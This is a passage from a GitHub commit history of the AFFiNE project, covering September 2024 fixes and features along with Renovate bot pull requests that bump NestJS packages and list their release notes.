fix AF-1390
2024-09-24 10:05:58 +08:00
pengx17
6110767fa8
fix(electron): workaround for unstable e2e ( #8357 )
2024-09-24 01:54:09 +00:00
pengx17
503e020412
fix(electron): cookie redirecting issue ( #8347 )
...
fix AF-1416
2024-09-23 04:05:04 +00:00
CatsJuice
f9e0c1e57b
fix(core): remove openInfoModalAtom to avoid multiple modal opened in split-view ( #8329 )
...
close AF-1403
2024-09-23 03:51:48 +00:00
Saul-Mirone
35e232c61c
feat: migrate to blocksuite/affine ( #8332 )
...
Use `@blocksuite/affine` package for all blocksuite features in affine.
```ts
@blocksuite/store -> @blocksuite/affine/store
@blocksuite/global -> @blocksuite/affine/global
@blocksuite/block-std -> @blocksuite/affine/block-std
@blocksuite/blocks -> @blocksuite/affine/blocks
@blocksuite/presets -> @blocksuite/affine/presets
```
2024-09-20 10:55:47 +00:00
forehalo
39f60145fe
fix(core): circular dependency
2024-09-20 16:32:21 +08:00
forehalo
2cabc2dd50
fix(server): sign out
2024-09-20 16:32:04 +08:00
forehalo
e0f1fe4110
chore: bump base version to 0.17.0
2024-09-20 15:48:21 +08:00
renovate[bot]
cfd09b6634
chore: bump up blocksuite to v0.17.14 ( #8326 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Mirone <Saul-Mirone@outlook.com >
2024-09-20 07:44:19 +00:00
Fangdun Tsai
849193b4ab
fix(core): should show block link icon first ( #8328 )
2024-09-20 07:39:51 +00:00
Cats Juice
c87a392f29
fix(component): confirm modal should not clip content ( #8325 )
2024-09-20 07:38:15 +00:00
Peng Xiao
c26120ae36
fix(core): bring back menu offset ( #8327 )
2024-09-20 15:36:43 +08:00
forehalo
ec7c63019f
fix(core): use openExternal in electron ( #8323 )
2024-09-20 07:05:12 +00:00
fundon
8d4cc6a1db
fix(core): block links in doc info ( #8324 )
...

2024-09-20 06:54:09 +00:00
forehalo
4eb4c23e4a
feat(server): manage auth cookies ( #8317 )
2024-09-20 06:37:11 +00:00
EYHN
096f50b83b
chore(i18n): cleanup i18n file ( #8318 )
2024-09-20 06:25:17 +00:00
fundon
bed70cd51a
chore(core): add tests for toURLSearchParams ( #8322 )
2024-09-20 04:14:48 +00:00
fundon
661594aec8
feat(core): enhance share page with selector ( #8319 )
...
Closes [BS-1346](https://linear.app/affine-design/issue/BS-1346/白板上的-link-to-block-在只读模式下打开无法跳转和高亮 )
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/8ypiIKZXudF5a0tIgIzf/84bb27a9-608f-4cfc-a4c8-58de8aa5d791.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/8ypiIKZXudF5a0tIgIzf/84bb27a9-608f-4cfc-a4c8-58de8aa5d791.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/8ypiIKZXudF5a0tIgIzf/84bb27a9-608f-4cfc-a4c8-58de8aa5d791.mov ">Screen Recording 2024-09-20 at 06.21.45.mov</video>
2024-09-20 03:42:08 +00:00
forehalo
e3e15c6134
fix(core): rollback ai service ( #8321 )
...
closes #8320
2024-09-20 01:49:51 +00:00
EYHN
7184d8348f
fix(core): fix web login ( #8312 )
2024-09-19 16:24:05 +00:00
L-Sun
fc9e5fbb65
chore: bump blocksuite ( #8311 )
2024-09-19 10:07:20 +00:00
fundon
c47d44f569
chore(core): cancel block not found alert ( #8310 )
2024-09-19 09:18:17 +00:00
renovate
1417aca958
chore: Lock file maintenance ( #8264 )
...
This PR contains the following updates:
| Update | Change |
|---|---|
| lockFileMaintenance | All locks refreshed |
🔧 This Pull Request updates lock files to use the latest dependency versions.
---
### Configuration
📅 **Schedule**: Branch creation - "before 4am on Monday" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC43NC4xIiwidXBkYXRlZEluVmVyIjoiMzguNzQuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-19 08:57:19 +00:00
forehalo
260104c933
fix(server): renderer path ( #8305 )
2024-09-19 08:16:13 +00:00
EYHN
5d57f53a06
fix(core): adjust feature flag ( #8309 )
2024-09-19 15:26:33 +08:00
Cats Juice
a6c2f5dcd5
fix(component): correct notification action hover style ( #8303 )
2024-09-19 15:18:19 +08:00
Cats Juice
a38f291a01
fix(core): adjust pop position of editing property menu in setting ( #8308 )
2024-09-19 15:17:53 +08:00
pengx17
f6cd029c18
fix(core): add switch button to switch-to-edgeless notification ( #8300 )
...
fix AF-1359
2024-09-19 06:37:21 +00:00
pengx17
a88e82a534
fix(core): collection filter list animation ( #8299 )
...
fix AF-1373
2024-09-19 06:37:19 +00:00
CatsJuice
0450fcea8b
fix(core): sidebar scrollbar is coverd by resize handle ( #8307 )
...
close AF-1236
2024-09-19 06:25:08 +00:00
renovate
5842bfc96a
chore: bump up nestjs ( #8282 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@nestjs/common](https://nestjs.com ) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common )) | [`10.4.1` -> `10.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/10.4.1/10.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@nestjs/core](https://nestjs.com ) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core )) | [`10.4.1` -> `10.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/10.4.1/10.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@nestjs/platform-express](https://nestjs.com ) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express )) | [`10.4.1` -> `10.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/10.4.1/10.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@nestjs/platform-socket.io](https://nestjs.com ) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io )) | [`10.4.1` -> `10.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/10.4.1/10.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@nestjs/schedule](https://redirect.github.com/nestjs/schedule ) | [`4.1.0` -> `4.1.1`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/4.1.0/4.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@nestjs/testing](https://nestjs.com ) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/testing )) | [`10.4.1` -> `10.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2ftesting/10.4.1/10.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest ) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets )) | [`10.4.1` -> `10.4.3`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/10.4.1/10.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>nestjs/nest (@​nestjs/common)</summary>
### [`v10.4.3`](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
### [`v10.4.2`](https://redirect.github.com/nestjs/nest/compare/v10.4.1...696b4410a35a915a61f7bb58f87d7ac5b3e267e6 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.1...v10.4.2 )
</details>
<details>
<summary>nestjs/nest (@​nestjs/core)</summary>
### [`v10.4.3`](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
### [`v10.4.2`](https://redirect.github.com/nestjs/nest/compare/v10.4.1...696b4410a35a915a61f7bb58f87d7ac5b3e267e6 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.1...v10.4.2 )
</details>
<details>
<summary>nestjs/nest (@​nestjs/platform-express)</summary>
### [`v10.4.3`](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
### [`v10.4.2`](https://redirect.github.com/nestjs/nest/compare/v10.4.1...696b4410a35a915a61f7bb58f87d7ac5b3e267e6 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.1...v10.4.2 )
</details>
<details>
<summary>nestjs/nest (@​nestjs/platform-socket.io)</summary>
### [`v10.4.3`](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
### [`v10.4.2`](https://redirect.github.com/nestjs/nest/releases/tag/v10.4.2 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.1...v10.4.2 )
##### v10.4.2 (2024-09-16)
##### Dependencies
- `common`, `core`, `microservices`, `platform-express`, `platform-fastify`, `platform-socket.io`, `platform-ws`, `testing`, `websockets`
- [#​13911](https://redirect.github.com/nestjs/nest/pull/13911 ) chore(deps): bump tslib from 2.6.3 to 2.7.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- `platform-fastify`
- [#​13938](https://redirect.github.com/nestjs/nest/pull/13938 ) chore(deps): bump light-my-request from 5.13.0 to 6.0.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- Other
- [#​13936](https://redirect.github.com/nestjs/nest/pull/13936 ) chore(deps-dev): bump lint-staged from 15.2.9 to 15.2.10 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13946](https://redirect.github.com/nestjs/nest/pull/13946 ) chore(deps): bump webpack and [@​nestjs/cli](https://redirect.github.com/nestjs/cli ) in /sample/02-gateways ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13947](https://redirect.github.com/nestjs/nest/pull/13947 ) chore(deps-dev): bump webpack from 5.91.0 to 5.94.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13966](https://redirect.github.com/nestjs/nest/pull/13966 ) chore(deps): bump dset from 3.1.2 to 3.1.4 in /sample/32-graphql-federation-schema-first/gateway ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13967](https://redirect.github.com/nestjs/nest/pull/13967 ) chore(deps): bump dset from 3.1.3 to 3.1.4 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13968](https://redirect.github.com/nestjs/nest/pull/13968 ) chore(deps-dev): bump [@​commitlint/cli](https://redirect.github.com/commitlint/cli ) from 19.4.0 to 19.5.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13969](https://redirect.github.com/nestjs/nest/pull/13969 ) chore(deps-dev): bump mongoose from 8.6.0 to 8.6.2 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13973](https://redirect.github.com/nestjs/nest/pull/13973 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.5.1 to 22.5.5 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13922](https://redirect.github.com/nestjs/nest/pull/13922 ) chore(deps): bump [@​apollo/gateway](https://redirect.github.com/apollo/gateway ) from 2.2.3 to 2.9.0 in /sample/31-graphql-federation-code-first/users-application ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13921](https://redirect.github.com/nestjs/nest/pull/13921 ) chore(deps): bump [@​apollo/query-planner](https://redirect.github.com/apollo/query-planner ) from 2.4.8 to 2.9.0 in /sample/31-graphql-federation-code-first/posts-application ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13926](https://redirect.github.com/nestjs/nest/pull/13926 ) chore(deps-dev): bump mongoose from 8.5.3 to 8.6.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13928](https://redirect.github.com/nestjs/nest/pull/13928 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.5.0 to 22.5.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13929](https://redirect.github.com/nestjs/nest/pull/13929 ) chore(deps-dev): bump [@​commitlint/config-angular](https://redirect.github.com/commitlint/config-angular ) from 19.3.0 to 19.4.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13893](https://redirect.github.com/nestjs/nest/pull/13893 ) chore(deps-dev): bump [@​typescript-eslint/eslint-plugin](https://redirect.github.com/typescript-eslint/eslint-plugin ) from 7.18.0 to 8.2.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13896](https://redirect.github.com/nestjs/nest/pull/13896 ) chore(deps-dev): bump husky from 9.1.4 to 9.1.5 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13897](https://redirect.github.com/nestjs/nest/pull/13897 ) chore(deps-dev): bump core-js from 3.38.0 to 3.38.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13901](https://redirect.github.com/nestjs/nest/pull/13901 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.3.0 to 22.5.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13902](https://redirect.github.com/nestjs/nest/pull/13902 ) chore(deps-dev): bump artillery from 2.0.19 to 2.0.20 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13884](https://redirect.github.com/nestjs/nest/pull/13884 ) chore(deps-dev): bump mongoose from 8.5.2 to 8.5.3 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13885](https://redirect.github.com/nestjs/nest/pull/13885 ) chore(deps-dev): bump lint-staged from 15.2.8 to 15.2.9 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13890](https://redirect.github.com/nestjs/nest/pull/13890 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.2.0 to 22.3.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
##### Committers: 3
- Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec ))
- Micael Levi L. Cavalcante ([@​micalevisk](https://redirect.github.com/micalevisk ))
- [@​haouvw](https://redirect.github.com/haouvw )
</details>
<details>
<summary>nestjs/schedule (@​nestjs/schedule)</summary>
### [`v4.1.1`](https://redirect.github.com/nestjs/schedule/releases/tag/4.1.1 )
[Compare Source](https://redirect.github.com/nestjs/schedule/compare/4.1.0...4.1.1 )
- Merge pull request [#​1756](https://redirect.github.com/nestjs/schedule/issues/1756 ) from hkjeffchan/patch-1 ([`745118f`](https://redirect.github.com/nestjs/schedule/commit/745118f ))
- chore(deps): update dependency sinon to v19.0.2 ([`baf7cb8`](https://redirect.github.com/nestjs/schedule/commit/baf7cb8 ))
- Fix deprecated warning for interval.decorator.ts ([`ee56e9b`](https://redirect.github.com/nestjs/schedule/commit/ee56e9b ))
- chore(deps): update dependency sinon to v19 ([`65d91a4`](https://redirect.github.com/nestjs/schedule/commit/65d91a4 ))
- chore(deps): update dependency [@​types/jest](https://redirect.github.com/types/jest ) to v29.5.13 ([`c97e429`](https://redirect.github.com/nestjs/schedule/commit/c97e429 ))
- chore(deps): update dependency husky to v9.1.6 ([`034cea9`](https://redirect.github.com/nestjs/schedule/commit/034cea9 ))
- chore(deps): update commitlint monorepo to v19.5.0 ([`db3fd97`](https://redirect.github.com/nestjs/schedule/commit/db3fd97 ))
- chore(deps): update dependency sinon to v18.0.1 ([`b52e5d8`](https://redirect.github.com/nestjs/schedule/commit/b52e5d8 ))
- chore(deps): update typescript-eslint monorepo to v8.5.0 ([`5244efc`](https://redirect.github.com/nestjs/schedule/commit/5244efc ))
- chore(deps): update dependency typescript to v5.6.2 ([`8ca561f`](https://redirect.github.com/nestjs/schedule/commit/8ca561f ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.16.5 ([`45a7932`](https://redirect.github.com/nestjs/schedule/commit/45a7932 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.16.4 ([`5a27065`](https://redirect.github.com/nestjs/schedule/commit/5a27065 ))
- chore(deps): update dependency eslint-plugin-import to v2.30.0 ([`db347f5`](https://redirect.github.com/nestjs/schedule/commit/db347f5 ))
- chore(deps): update typescript-eslint monorepo to v8.4.0 ([`bc2fe2e`](https://redirect.github.com/nestjs/schedule/commit/bc2fe2e ))
- chore(deps): update dependency lint-staged to v15.2.10 ([`3874d03`](https://redirect.github.com/nestjs/schedule/commit/3874d03 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.16.3 ([`c02fa08`](https://redirect.github.com/nestjs/schedule/commit/c02fa08 ))
- chore(deps): update commitlint monorepo to v19.4.1 ([`8e9aa21`](https://redirect.github.com/nestjs/schedule/commit/8e9aa21 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.16.2 ([`a17b71e`](https://redirect.github.com/nestjs/schedule/commit/a17b71e ))
- chore(deps): update typescript-eslint monorepo to v8.3.0 ([`2c3880f`](https://redirect.github.com/nestjs/schedule/commit/2c3880f ))
- chore(deps): update dependency ts-jest to v29.2.5 ([`55e2793`](https://redirect.github.com/nestjs/schedule/commit/55e2793 ))
- chore(deps): update dependency husky to v9.1.5 ([`c6f5a03`](https://redirect.github.com/nestjs/schedule/commit/c6f5a03 ))
- chore(deps): update typescript-eslint monorepo to v8.2.0 ([`793a7fa`](https://redirect.github.com/nestjs/schedule/commit/793a7fa ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.16.1 ([`f515193`](https://redirect.github.com/nestjs/schedule/commit/f515193 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.16.0 ([`1452ab7`](https://redirect.github.com/nestjs/schedule/commit/1452ab7 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.15.0 ([`b333c79`](https://redirect.github.com/nestjs/schedule/commit/b333c79 ))
- chore(deps): update nest monorepo to v10.4.1 ([`773cca5`](https://redirect.github.com/nestjs/schedule/commit/773cca5 ))
- chore(deps): update dependency lint-staged to v15.2.9 ([`4e039dc`](https://redirect.github.com/nestjs/schedule/commit/4e039dc ))
- chore(deps): update typescript-eslint monorepo to v8.1.0 ([`0d52e1c`](https://redirect.github.com/nestjs/schedule/commit/0d52e1c ))
- chore(deps): update nest monorepo to v10.4.0 ([`b1e6be2`](https://redirect.github.com/nestjs/schedule/commit/b1e6be2 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.14.15 ([`f65d083`](https://redirect.github.com/nestjs/schedule/commit/f65d083 ))
- chore(deps): update dependency [@​commitlint/cli](https://redirect.github.com/commitlint/cli ) to v19.4.0 ([`b160424`](https://redirect.github.com/nestjs/schedule/commit/b160424 ))
- chore(deps): update typescript-eslint monorepo to v8.0.1 ([`1038c56`](https://redirect.github.com/nestjs/schedule/commit/1038c56 ))
- chore(deps): update dependency lint-staged to v15.2.8 ([`e90b7db`](https://redirect.github.com/nestjs/schedule/commit/e90b7db ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.14.14 ([`479bd42`](https://redirect.github.com/nestjs/schedule/commit/479bd42 ))
- chore(deps): update dependency ts-jest to v29.2.4 ([`20e1a61`](https://redirect.github.com/nestjs/schedule/commit/20e1a61 ))
- chore(deps): update typescript-eslint monorepo to v8 ([`6766efd`](https://redirect.github.com/nestjs/schedule/commit/6766efd ))
- chore(deps): update typescript-eslint monorepo to v7.18.0 ([`815f62d`](https://redirect.github.com/nestjs/schedule/commit/815f62d ))
- chore(deps): update dependency husky to v9.1.4 ([`984bc96`](https://redirect.github.com/nestjs/schedule/commit/984bc96 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.14.13 ([`d6b84bb`](https://redirect.github.com/nestjs/schedule/commit/d6b84bb ))
- chore(deps): update dependency husky to v9.1.3 ([`e2d92e6`](https://redirect.github.com/nestjs/schedule/commit/e2d92e6 ))
- chore(deps): update dependency husky to v9.1.2 ([`75c9d16`](https://redirect.github.com/nestjs/schedule/commit/75c9d16 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.14.12 ([`c715b79`](https://redirect.github.com/nestjs/schedule/commit/c715b79 ))
- chore(deps): update dependency typescript to v5.5.4 ([`aa50721`](https://redirect.github.com/nestjs/schedule/commit/aa50721 ))
- chore(deps): update typescript-eslint monorepo to v7.17.0 ([`035049b`](https://redirect.github.com/nestjs/schedule/commit/035049b ))
- chore(deps): update dependency ts-jest to v29.2.3 ([`63ad71f`](https://redirect.github.com/nestjs/schedule/commit/63ad71f ))
- chore(deps): update dependency husky to v9.1.1 ([`1038a3d`](https://redirect.github.com/nestjs/schedule/commit/1038a3d ))
- chore(deps): update dependency husky to v9.1.0 ([`8f422bb`](https://redirect.github.com/nestjs/schedule/commit/8f422bb ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.14.11 ([`7fbeccd`](https://redirect.github.com/nestjs/schedule/commit/7fbeccd ))
- chore(deps): update typescript-eslint monorepo to v7.16.1 ([`9b2372e`](https://redirect.github.com/nestjs/schedule/commit/9b2372e ))
- chore(deps): update dependency release-it to v17.6.0 ([`4331480`](https://redirect.github.com/nestjs/schedule/commit/4331480 ))
- chore(deps): update dependency prettier to v3.3.3 ([`7d2b6e8`](https://redirect.github.com/nestjs/schedule/commit/7d2b6e8 ))
- chore(deps): update dependency ts-jest to v29.2.2 ([`7cc735a`](https://redirect.github.com/nestjs/schedule/commit/7cc735a ))
- chore(deps): update dependency rimraf to v6.0.1 ([`35ece54`](https://redirect.github.com/nestjs/schedule/commit/35ece54 ))
- chore(deps): update dependency ts-jest to v29.2.1 ([`970149c`](https://redirect.github.com/nestjs/schedule/commit/970149c ))
- chore(deps): update dependency rimraf to v6 ([`f97fd9d`](https://redirect.github.com/nestjs/schedule/commit/f97fd9d ))
- chore(deps): update dependency rimraf to v5.0.9 ([`0a6eef8`](https://redirect.github.com/nestjs/schedule/commit/0a6eef8 ))
- chore(deps): update typescript-eslint monorepo to v7.16.0 ([`d70b999`](https://redirect.github.com/nestjs/schedule/commit/d70b999 ))
- chore(deps): update dependency release-it to v17.5.0 ([`16c6a11`](https://redirect.github.com/nestjs/schedule/commit/16c6a11 ))
- chore(deps): update dependency ts-jest to v29.2.0 ([`09fec8b`](https://redirect.github.com/nestjs/schedule/commit/09fec8b ))
- chore(deps): update dependency rimraf to v5.0.8 ([`bb91d01`](https://redirect.github.com/nestjs/schedule/commit/bb91d01 ))
- chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node ) to v20.14.10 ([`b36fb04`](https://redirect.github.com/nestjs/schedule/commit/b36fb04 ))
</details>
<details>
<summary>nestjs/nest (@​nestjs/testing)</summary>
### [`v10.4.3`](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
### [`v10.4.2`](https://redirect.github.com/nestjs/nest/releases/tag/v10.4.2 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.1...v10.4.2 )
#### v10.4.2 (2024-09-16)
##### Dependencies
- `common`, `core`, `microservices`, `platform-express`, `platform-fastify`, `platform-socket.io`, `platform-ws`, `testing`, `websockets`
- [#​13911](https://redirect.github.com/nestjs/nest/pull/13911 ) chore(deps): bump tslib from 2.6.3 to 2.7.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- `platform-fastify`
- [#​13938](https://redirect.github.com/nestjs/nest/pull/13938 ) chore(deps): bump light-my-request from 5.13.0 to 6.0.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- Other
- [#​13936](https://redirect.github.com/nestjs/nest/pull/13936 ) chore(deps-dev): bump lint-staged from 15.2.9 to 15.2.10 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13946](https://redirect.github.com/nestjs/nest/pull/13946 ) chore(deps): bump webpack and [@​nestjs/cli](https://redirect.github.com/nestjs/cli ) in /sample/02-gateways ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13947](https://redirect.github.com/nestjs/nest/pull/13947 ) chore(deps-dev): bump webpack from 5.91.0 to 5.94.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13966](https://redirect.github.com/nestjs/nest/pull/13966 ) chore(deps): bump dset from 3.1.2 to 3.1.4 in /sample/32-graphql-federation-schema-first/gateway ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13967](https://redirect.github.com/nestjs/nest/pull/13967 ) chore(deps): bump dset from 3.1.3 to 3.1.4 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13968](https://redirect.github.com/nestjs/nest/pull/13968 ) chore(deps-dev): bump [@​commitlint/cli](https://redirect.github.com/commitlint/cli ) from 19.4.0 to 19.5.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13969](https://redirect.github.com/nestjs/nest/pull/13969 ) chore(deps-dev): bump mongoose from 8.6.0 to 8.6.2 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13973](https://redirect.github.com/nestjs/nest/pull/13973 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.5.1 to 22.5.5 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13922](https://redirect.github.com/nestjs/nest/pull/13922 ) chore(deps): bump [@​apollo/gateway](https://redirect.github.com/apollo/gateway ) from 2.2.3 to 2.9.0 in /sample/31-graphql-federation-code-first/users-application ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13921](https://redirect.github.com/nestjs/nest/pull/13921 ) chore(deps): bump [@​apollo/query-planner](https://redirect.github.com/apollo/query-planner ) from 2.4.8 to 2.9.0 in /sample/31-graphql-federation-code-first/posts-application ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13926](https://redirect.github.com/nestjs/nest/pull/13926 ) chore(deps-dev): bump mongoose from 8.5.3 to 8.6.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13928](https://redirect.github.com/nestjs/nest/pull/13928 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.5.0 to 22.5.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13929](https://redirect.github.com/nestjs/nest/pull/13929 ) chore(deps-dev): bump [@​commitlint/config-angular](https://redirect.github.com/commitlint/config-angular ) from 19.3.0 to 19.4.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13893](https://redirect.github.com/nestjs/nest/pull/13893 ) chore(deps-dev): bump [@​typescript-eslint/eslint-plugin](https://redirect.github.com/typescript-eslint/eslint-plugin ) from 7.18.0 to 8.2.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13896](https://redirect.github.com/nestjs/nest/pull/13896 ) chore(deps-dev): bump husky from 9.1.4 to 9.1.5 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13897](https://redirect.github.com/nestjs/nest/pull/13897 ) chore(deps-dev): bump core-js from 3.38.0 to 3.38.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13901](https://redirect.github.com/nestjs/nest/pull/13901 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.3.0 to 22.5.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
